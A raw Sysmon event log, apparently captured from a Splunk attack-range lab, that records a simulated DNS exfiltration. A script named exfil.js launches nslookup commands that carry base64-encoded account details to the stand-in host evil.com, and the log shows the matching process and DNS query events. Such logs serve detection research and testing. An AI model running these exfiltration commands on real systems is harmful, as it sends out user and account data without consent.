dll.dll+51791 10341000x8000000000000000196173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.722{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.722{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.722{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-9C3E-000000005F02}7784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.722{2E1864BB-17A1-629A-783D-000000005F02}55527320C:\Windows\System32\WScript.exe{2E1864BB-17AE-629A-9C3E-000000005F02}7784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.733{2E1864BB-17AE-629A-9C3E-000000005F02}7784C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfawx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.722{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxeufh.tmpMD5=FA64F29A2105005DB944F49BBF99C790,SHA256=AFC24D0EC0C7AAB04F6CC9902001B05F5184E11791617287F2A4C4C94A76A48D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.700{2E1864BB-17AE-629A-9A3E-000000005F02}69287832C:\Windows\system32\conhost.exe{2E1864BB-17AE-629A-9B3E-000000005F02}2900C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.685{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-9B3E-000000005F02}2900C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.685{2E1864BB-17AE-629A-993E-000000005F02}50363348C:\Windows\system32\cmd.exe{2E1864BB-17AE-629A-9B3E-000000005F02}2900C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.685{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.685{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.685{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.685{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.693{2E1864BB-17AE-629A-9B3E-000000005F02}2900C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AE-629A-993E-000000005F02}5036C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxeufh.tmp 2>&1 23542300x8000000000000000196159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.685{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94FE157A484AC77973307A33DFFA759B,SHA256=97738E0008B54E5DDEF2B9C61380C7D1DAEF04C57BFA2BC4B05A863DB1E3C674,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.654{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AE-629A-9A3E-000000005F02}6928C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.654{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AE-629A-9A3E-000000005F02}6928C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000196156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.654{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBDF7D5E265E9835E399DC5E4DB8239F,SHA256=CE929DDD24C18472499EC3B05583E5A068ED60EFA8BD2779D885EFEBBF2EAC6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.637{2E1864BB-17AE-629A-9A3E-000000005F02}69287832C:\Windows\system32\conhost.exe{2E1864BB-17AE-629A-993E-000000005F02}5036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.622{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-9A3E-000000005F02}6928C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.622{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.622{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.622{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-993E-000000005F02}5036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.622{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.622{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.621{2E1864BB-17A1-629A-783D-000000005F02}55525904C:\Windows\System32\WScript.exe{2E1864BB-17AE-629A-993E-000000005F02}5036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.621{2E1864BB-17AE-629A-993E-000000005F02}5036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxeufh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.617{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmrq.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.553{2E1864BB-17AE-629A-973E-000000005F02}46161788C:\Windows\system32\conhost.exe{2E1864BB-17AE-629A-983E-000000005F02}3360C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000196144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.355{00000000-0000-0000-0000-000000000000}7392evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000196143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.553{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000196142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.219{00000000-0000-0000-0000-000000000000}1276evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000196141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.553{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000196140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.111{00000000-0000-0000-0000-000000000000}908evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000196139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 